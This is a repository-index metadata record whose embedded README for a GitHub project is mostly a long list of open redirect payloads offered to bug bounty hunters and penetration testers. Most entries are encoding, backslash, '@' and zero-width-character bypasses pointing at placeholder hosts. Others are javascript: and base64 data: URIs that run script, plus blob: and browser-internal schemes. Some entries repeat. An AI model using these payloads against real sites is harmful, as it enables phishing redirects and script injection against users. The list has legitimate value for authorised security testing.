{"id":25804796,"url":"https://github.com/yogsec/open-redirect-payloads","last_synced_at":"2026-02-25T02:32:45.947Z","repository":{"id":277801512,"uuid":"933532300","full_name":"yogsec/Open-Redirect-Payloads","owner":"yogsec","description":"A collection of various Open Redirect payloads for security researchers, penetration testers, and bug bounty hunters.","archived":false,"fork":false,"pushed_at":"2025-02-16T07:36:28.000Z","size":29,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-28T01:24:34.283Z","etag":null,"topics":["cybersecurity","hackers","hacking","open-redirect","open-redirect-list","open-redirect-payload","open-redirect-payload-list","open-redirect-payloads","open-redirect-vulnerability","payload","payloads","security","vulnerability"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/yogsec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-16T07:23:52.000Z","updated_at":"2025-02-16T07:39:54.000Z","dependencies_parsed_at":"2025-02-16T08:34:02.283Z","dependency_job_id":null,"html_url":"https://github.com/yogsec/Open-Redirect-Payloads","commit_stats":null,"previous_names":["yogsec/open-redirect-payloads"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/yogsec/Open-Redirect-Payloads","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOpen-Redirect-Payloads","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOpen-Redirect-Payloads/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOpen-Redirect-Payloads/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOpen-Redirect-Payloads/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yogsec","download_url":"https://codeload.github.com/yogsec/Open-Redirect-Payloads/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FOpen-Redirect-Payloads/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29809086,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-24T22:43:48.403Z","status":"online","status_checked_at":"2026-02-25T02:00:07.329Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","hackers","hacking","open-redirect","open-redirect-list","open-redirect-payload","open-redirect-payload-list","open-redirect-payloads","open-redirect-vulnerability","payload","payloads","security","vulnerability"],"created_at":"2025-02-27T18:53:52.154Z","updated_at":"2026-02-25T02:32:45.708Z","avatar_url":"https://github.com/yogsec.png","language":null,"funding_links":["https://buymeacoffee.com/yogsec"],"categories":[],"sub_categories":[],"readme":"# Open Redirect Payloads\n\nA collection of various Open Redirect payloads for security researchers, penetration testers, and bug bounty hunters. This repository aims to provide a comprehensive list of payloads to detect and exploit Open Redirect vulnerabilities in web applications.\n\n![Open-Redirect](https://github.com/yogsec/Open-Redirect-Payloads/blob/main/open-redirection-vulnerability.png)\n\n## šŸšØ What is an Open Redirect Vulnerability?\nAn Open Redirect vulnerability occurs when a web application allows an attacker to redirect users to an external, malicious URL without proper validation. This can be exploited for phishing attacks, malware distribution, and other malicious activities.\n\n## šŸ”„ Why This Repository?\n- Centralized payload list for Open Redirect testing.\n- Useful for bug hunters and security professionals.\n- Simplifies testing for Open Redirect vulnerabilities.\n\n## šŸ“œ Payload Categories\n- Basic Redirects\n- URL Encoded Redirects\n- Double Encoding\n- Path Traversal Redirects\n- JavaScript-based Redirects\n- Data URI Redirects\n- Advanced Bypass Techniques\n\n## šŸ“‚ Structure\n```\nopen-redirect-payloads/\nā”‚\nā”œā”€ā”€ Open-Redirect-Payloads.txt\n\n```\n\n---\n\n## šŸŒŸ Let's Connect!\n\nHello, Hacker! šŸ‘‹ We'd love to stay connected with you. Reach out to us on any of these platforms and let's build something amazing together:\n\nšŸŒ **Website:** [https://yogsec.github.io/yogsec/](https://yogsec.github.io/yogsec/) \nšŸ“œ **Linktree:** [https://linktr.ee/yogsec](https://linktr.ee/yogsec) \nšŸ”— **GitHub:** [https://github.com/yogsec](https://github.com/yogsec) \nšŸ’¼ **LinkedIn (Company):** [https://www.linkedin.com/company/yogsec/](https://www.linkedin.com/company/yogsec/) \nšŸ“· **Instagram:** [https://www.instagram.com/yogsec.io/](https://www.instagram.com/yogsec.io/) \nšŸ¦ **Twitter (X):** [https://x.com/yogsec](https://x.com/yogsec) \nšŸ‘Øā€šŸ’¼ **Personal LinkedIn:** [https://www.linkedin.com/in/bug-bounty-hunter/](https://www.linkedin.com/in/bug-bounty-hunter/) \nšŸ“§ **Email:** abhinavsingwal@gmail.com\n\n---\n\n## ā˜• Buy Me a Coffee\n\nIf you find our work helpful and would like to support us, consider buying us a coffee. Your support keeps us motivated and helps us create more awesome content. ā¤ļø\n\nā˜• **Support Us Here:** [https://buymeacoffee.com/yogsec](https://buymeacoffee.com/yogsec)\n\n---\n\n## šŸ“¦ Usage\nClone the repository:\n```bash\ngit clone https://github.com/yogsec/Open-Redirect-Payloads.git\n```\nUse the payloads for testing Open Redirect vulnerabilities in your bug bounty and pentesting engagements.\n\n---\n## šŸ“¦ Payloads\n\n```bash\nhttps://attacker.com\n//attacker.com\n/\\/\\/attacker.com\nhttps://attacker.com/%2e%2e\n//attacker.com/%2f..\nhttps://attacker.com/%2e%2f\n//attacker.com/%2e\n/\\attacker.com\nhttps://attacker.com%00.example.com\nhttps://attacker.com?.example.com\nhttps://attacker.com;.example.com\n//attacker.com?.example.com\n//attacker.com/.example.com\n//attacker.com@evil.com\nhttps://attacker.com@evil.com\nhttps://evil.com/%09https://attacker.com\nhttps://evil.com/%0Ahttps://attacker.com\nhttps://evil.com/%0Dhttps://attacker.com\nhttps://evil.com/%0Bhttps://attacker.com\nhttps://evil.com/%0Chttps://attacker.com\n//evil.com:80/%5Cattacker.com\nhttps://evil.com%2F%2Fattacker.com\nhttps://evil.com%2f%2fattacker.com\nhttps://evil.com/%5cattacker.com\nhttps://evil.com//%5cattacker.com\n//evil.com%2f%2fattacker.com\nhttps://evil.com/%09attacker.com\nhttps://evil.com/%23attacker.com\nhttps://evil.com/%20attacker.com\nhttps://evil.com/%2Fattacker.com\nhttps://evil.com/%3Fattacker.com\nhttps://evil.com/%26attacker.com\nhttps://evil.com/%3Battacker.com\nhttps://evil.com/%5Cattacker.com\n//evil.com:80@attacker.com\nhttps://evil.com@attacker.com\nhttps://evil.com@attacker.com/%2e\nhttps://evil.com@attacker.com/%2f\nhttps://evil.com@attacker.com/%2e%2e\nhttps://evil.com@attacker.com/%2e%2f\nhttps://evil.com@attacker.com/%2e%2e/\nhttps://evil.com@attacker.com/%2e%2e%2f\nhttps://evil.com@attacker.com/%2f%2e\nhttps://evil.com@attacker.com/%2f%2e%2e\nhttps://evil.com@attacker.com/%2f%2e%2f\nhttps://evil.com@attacker.com/%2f%2e%2e/\nhttps://evil.com@attacker.com/%2f%2e%2e%2f\nhttps://attacker.com#@evil.com\nhttps://attacker.com?next=https://evil.com\nhttps://attacker.com?redirect=https://evil.com\nhttps://attacker.com?url=https://evil.com\nhttps://attacker.com/?url=https://evil.com\nhttps://attacker.com/login?next=https://evil.com\nhttps://attacker.com/redirect?url=https://evil.com\nhttps://attacker.com/redirect?to=https://evil.com\nhttps://attacker.com/redirect?redirect_url=https://evil.com\nhttps://attacker.com/redirect?next_url=https://evil.com\nhttps://attacker.com/redirect?dest=https://evil.com\nhttps://attacker.com/redirect?out=https://evil.com\nhttps://attacker.com/redirect?external=https://evil.com\nhttps://attacker.com/redirect?callback=https://evil.com\nhttps://attacker.com/redirect?forward=https://evil.com\nhttps://attacker.com/redirect?go=https://evil.com\nhttps://attacker.com/redirect?target=https://evil.com\nhttps://attacker.com/redirect?u=https://evil.com\nhttps://attacker.com/redirect?link=https://evil.com\nhttps://attacker.com/redirect?continue=https://evil.com\nhttps://attacker.com/redirect?path=https://evil.com\nhttps://attacker.com/redirect?redir=https://evil.com\nhttps://attacker.com/redirect?return=https://evil.com\nhttps://attacker.com/redirect?ext=https://evil.com\nhttps://attacker.com/redirect?location=https://evil.com\nhttps://attacker.com/redirect?nextpage=https://evil.com\nhttps://attacker.com/redirect?outbound=https://evil.com\nhttps://attacker.com/redirect?jump=https://evil.com\nhttps://attacker.com/redirect?source=https://evil.com\nhttps://attacker.com/redirect?ref=https://evil.com\nhttps://attacker.com/redirect?desturl=https://evil.com\nhttps://attacker.com/redirect?goto=https://evil.com\nhttps://attacker.com/redirect?url=http://evil.com\nhttps://attacker.com/redirect?url=//evil.com\nhttps://attacker.com/redirect?url=//evil.com/\nhttps://attacker.com/redirect?url=/\\/evil.com\nhttps://attacker.com/redirect?url=%2f%2fevil.com\nhttps://attacker.com/redirect?url=%5cevil.com\nhttps://attacker.com/redirect?url=%2f%5cevil.com\nhttps://attacker.com/redirect?url=%2f..%2fevil.com\nhttps://attacker.com/redirect?url=%2e%2fevil.com\nhttps://attacker.com/redirect?url=%2e%2e%2fevil.com\nhttps://attacker.com/redirect?url=%2e%2e%2f..%2fevil.com\nhttps://attacker.com/redirect?url=%00evil.com\nhttps://attacker.com/redirect?url=%09evil.com\nhttps://attacker.com/redirect?url=%0aevil.com\nhttps://attacker.com/redirect?url=%0devil.com\nhttps://attacker.com/redirect?url=%23evil.com\nhttps://attacker.com/redirect?url=%20evil.com\nhttps://attacker.com/redirect?url=%26evil.com\nhttps://attacker.com/redirect?url=%3bevil.com\nhttps://attacker.com/redirect?url=%3fevil.com\nhttps://attacker.com/redirect?url=%23%0ahttps://evil.com\nhttps:%252f%252fattacker.com\nhttps://%2F%2Fattacker.com\nhttps://evil.com/%2e/%2e/%2e/%2e/%2fhttps://attacker.com\nhttps://evil.com///%2e%2e/%2e%2e/https://attacker.com\nhttps://evil.com/////%252e%252e/%252e%252e/https://attacker.com\nhttps://evil.com/%3f%2f%2fattacker.com\nhttps://evil.com/%26%2f%2fattacker.com\nhttps://evil.com/%3b%2f%2fattacker.com\nhttps://evil.com/%23%2f%2fattacker.com\nhttps://evil.com/%2f%2e%2fhttps://attacker.com\nhttps://evil.com/%2e%2e%2f%2e%2e%2fhttps://attacker.com\nhttps://evil.com/%3Fredirect=https://attacker.com\nhttps://evil.com/%0Ahttps://attacker.com\nhttps://evil.com/%09https://attacker.com\nhttps://evil.com/%23https://attacker.com\nhttps://evil.com/%20https://attacker.com\nhttps://evil.com/%0Dhttps://attacker.com\nhttps://evil.com/?%2f%2fattacker.com\nhttps://evil.com/%2500https://attacker.com\nhttps://evil.com/%2e%2e%2fhttps://attacker.com\nhttps://evil.com/%2f%2e%2e/https://attacker.com\nhttps://evil.com/%2fhttps://attacker.com%2f\nhttps://evil.com/%2f%252e%252e/https://attacker.com\nhttps://evil.com/%252f%252e%252e/https://attacker.com\nhttps://evil.com/..;/https://attacker.com\nhttps://evil.com/;/https://attacker.com\nhttps://evil.com/%5chttps://attacker.com\nhttps://evil.com/%5c/%5c/https://attacker.com\nhttps://evil.com/%2f/%2e%2e/%2e%2e/https://attacker.com\nhttps://evil.com/%2e/%2e%2e/%2e%2e/%2fhttps://attacker.com\nhttps://evil.com/%5c%5chttps://attacker.com\nhttps://evil.com/%2f%5chttps://attacker.com\nhttps://evil.com/%2f..%2f..%2fhttps://attacker.com\nhttps://evil.com/%2e/%2e/%2e/%2e/%2e/%2fhttps://attacker.com\nhttps://evil.com/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2fhttps://attacker.com\nhttps://evil.com/%3f@https://attacker.com\nhttps://evil.com/%3b@https://attacker.com\nhttps://evil.com/%23@https://attacker.com\nhttps://evil.com/%3dhttps://attacker.com\nhttps://evil.com/%3d/%2fhttps://attacker.com\nhttps://evil.com/%0A@https://attacker.com\nhttps://evil.com/%0D@https://attacker.com\nhttps://evil.com/%09@https://attacker.com\nhttps://evil.com/%0B@https://attacker.com\nhttps://evil.com/%0C@https://attacker.com\nhttps://evil.com/%20@https://attacker.com\nhttps://evil.com/?redirect_url=https://attacker.com%00\nhttps://evil.com/?url=https://attacker.com%23\nhttps://evil.com/?url=https://attacker.com%0A\nhttps://evil.com/?url=https://attacker.com%09\nhttps://evil.com/?url=https://attacker.com%0D\nhttps://evil.com/?url=https://attacker.com%0B\nhttps://evil.com/?url=https://attacker.com%0C\nhttps://evil.com/?url=https://attacker.com%20\nhttps://evil.com/%E2%80%8Bhttps://attacker.com\nhttps://evil.com/%E2%80%8Chttps://attacker.com\nhttps://evil.com/%E2%80%8Dhttps://attacker.com\nhttps://evil.com/%E2%80%8Ehttps://attacker.com\nhttps://evil.com/%E2%80%8Fhttps://attacker.com\nhttps://evil.com/%C2%A0https://attacker.com\nhttps://evil.com/%C2%ADhttps://attacker.com\nhttps://evil.com/%E1%A0%8Dhttps://attacker.com\nhttps://evil.com/%EF%BB%BFhttps://attacker.com\nhttps://evil.com/?url=javascript:alert('XSS')\nhttps://evil.com/?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=\nhttps://evil.com/?url=javascript:void(location='https://attacker.com')\nhttps://evil.com/?url=javascript:void(document.location='https://attacker.com')\nhttps://evil.com/%u0000https://attacker.com\nhttps://evil.com/?url=https://%2500attacker.com\nhttps://evil.com/?url=https://%E2%80%8Eattacker.com\nhttps://evil.com/?url=https://%C2%A0attacker.com\nhttps://evil.com/?url=https://%C2%ADattacker.com\nhttps://evil.com/?url=https://%EF%BB%BFattacker.com\nhttps://evil.com/?url=https://attacker.com%2523\nhttps://evil.com/?url=https://attacker.com%252F\nhttps://evil.com/?url=https://attacker.com%255C\nhttps://evil.com/?url=https://attacker.com%2500\nhttps://evil.com/%00https://attacker.com\nhttps://evil.com/%2Fhttps://attacker.com\nhttps://evil.com/evil/..;/https://attacker.com\nhttps://evil.com/%E2%80%89https://attacker.com\nhttps://evil.com/%E2%80%83https://attacker.com\nhttps://evil.com/%E2%80%82https://attacker.com\nhttps://evil.com/%E2%80%84https://attacker.com\nhttps://evil.com/%E2%80%85https://attacker.com\nhttps://evil.com/%E2%80%86https://attacker.com\nhttps://evil.com/%E2%80%87https://attacker.com\nhttps://evil.com/%E2%80%88https://attacker.com\nhttps://evil.com/%E2%80%8Ahttps://attacker.com\nhttps://evil.com/%E3%80%80https://attacker.com\nhttps://evil.com/%C2%A0https://attacker.com\nhttps://evil.com/%E3%80%80https://attacker.com\n\\\\attacker.com\n///attacker.com\n////attacker.com\nhttps:///attacker.com\nhttps:\\\\attacker.com\nhttps:/\\\\attacker.com\nhttps:\\\\/attacker.com\nhttps:\\\\\\\\attacker.com\nhttp://evil.com:80@attacker.com\nhttps://evil.com:443@attacker.com\nhttps://evil.com:@attacker.com\nhttps://evil.com#@attacker.com\nhttps://evil.com/foo?bar=@attacker.com\nhttps://evil.com%2F%2Fattacker.com\nhttps://evil.com%3Aattacker.com\nhttps://evil.com%0Ahttps://attacker.com\nhttps://evil.com%0Dhttps://attacker.com\nhttps://evil.com%09https://attacker.com\nhttps://evil.com%23https://attacker.com\nhttps://evil.com/%EF%BB%BFhttps://attacker.com\nhttps://evil.com/%252e%252e/https://attacker.com\nhttps://evil.com/%2e/%2e/%2e/%2e/%2e/%2e/%2e/%2e/https://attacker.com\nhttps://evil.com//%2e%2e/%2e%2e/https://attacker.com\nhttps://evil.com/%252f%252fattacker.com\nhttps://evil.com/%3fhttps://attacker.com\nhttps://evil.com/%3bhttps://attacker.com\nhttps://evil.com/%2f%5c%5chttps://attacker.com\nhttps://evil.com/%3a%2f%2fattacker.com\nhttps://evil.com/%2523https://attacker.com\nhttps://evil.com/%252fhttps://attacker.com\nhttps://evil.com#https://attacker.com\nhttps://evil.com/#https://attacker.com\nhttps://evil.com/%00https://attacker.com\nhttps://evil.com/%2500https://attacker.com\nhttps://evil.com/%00/%00https://attacker.com\nhttps://evil.com/%23%00https://attacker.com\nhttps://evil.com/%23/%00https://attacker.com\nhttps://evil.com/%23%2500https://attacker.com\nhttps://evil.com/foo#@https://attacker.com\nhttps://evil.com/bar/%00https://attacker.com\nhttps://evil.com\\@attacker.com\nhttps://evil.com\\\\attacker.com\nhttps://evil.com\\\\@attacker.com\nhttps://evil.com\\/attacker.com\nhttps://evil.com\\\\evil.com@attacker.com\nhttps://evil.com/%5c@attacker.com\nhttps://evil.com/%5c%5cattacker.com\nhttps://evil.com/%5c%5c%40attacker.com\nhttps://evil.com/%5c/%5cattacker.com\nhttps://evil.com//%5cattacker.com\njavascript:window.location='https://attacker.com'\njavascript:document.location='https://attacker.com'\njavascript:window.open('https://attacker.com')\njavascript:void(location='https://attacker.com')\ndata:text/html,\u003cscript\u003elocation='https://attacker.com'\u003c/script\u003e\ndata:text/html;base64,PHNjcmlwdD5sb2NhdGlvbiA9ICdodHRwczovL2F0dGFja2VyLmNvbSc8L3NjcmlwdD4=\njavascript://%0Aalert(1)\njavascript://%0Awindow.location='https://attacker.com'\njavascript:alert%2500('XSS')\njavascript:window['locati'+'on']='https://attacker.com'\nhttps://evil.com/%E2%80%8Bhttps://attacker.com\nhttps://evil.com/%E2%80%8Chttps://attacker.com\nhttps://evil.com/%E2%80%8Dhttps://attacker.com\nhttps://evil.com/%E2%80%8Ehttps://attacker.com\nhttps://evil.com/%E2%80%8Fhttps://attacker.com\nhttps://evil.com/%E2%80%AAhttps://attacker.com\nhttps://evil.com/%E2%80%ABhttps://attacker.com\nhttps://evil.com/%E2%80%AChttps://attacker.com\nhttps://evil.com/%E2%80%ADhttps://attacker.com\nhttps://evil.com/%E2%80%AEhttps://attacker.com\nhttps://evil.com/%252F%252Fattacker.com\nhttps://evil.com/%2523https://attacker.com\nhttps://evil.com/%252e%252e%252fhttps://attacker.com\nhttps://evil.com/%252f%252f%252fattacker.com\nhttps://evil.com/%252f%255cattacker.com\nhttps://evil.com/%252f%252e%252e/%252e%252e/https://attacker.com\nhttps://evil.com/%252f%252e%252e/%255chttps://attacker.com\nhttps://evil.com/%252f%252e%252e/%252e%252e/%255cattacker.com\nhttps://evil.com/%25%32%66attacker.com\nhttps://evil.com/%25%30%30https://attacker.com\nftp://attacker.com\nfile://attacker.com\ngopher://attacker.com\ntelnet://attacker.com\nmailto:evil@attacker.com\njavascript://www.google.com%0Aalert(1)\nchrome://settings\nchrome://version\nchrome://about\nchrome://accessibility\nabout:blank\nabout:data\nabout:srcdoc\nview-source:https://attacker.com\nblob:https://attacker.com\nblob:https://evil.com/%2e%2e/https://attacker.com\nblob:null/https://attacker.com\nblob:data:text/html,\u003cscript\u003ealert(1)\u003c/script\u003e\nblob:data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\njavascript:location.replace('https://attacker.com')\n```\n---\n\n## āš ļø Disclaimer\nThis repository is intended for educational and ethical purposes only. The author is not responsible for any misuse of the information provided.\n\n\n## šŸ¤ Contributing\nContributions are welcome! Feel free to submit a pull request with new payloads or improvements.\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyogsec%2Fopen-redirect-payloads","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fyogsec%2Fopen-redirect-payloads","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyogsec%2Fopen-redirect-payloads/lists"}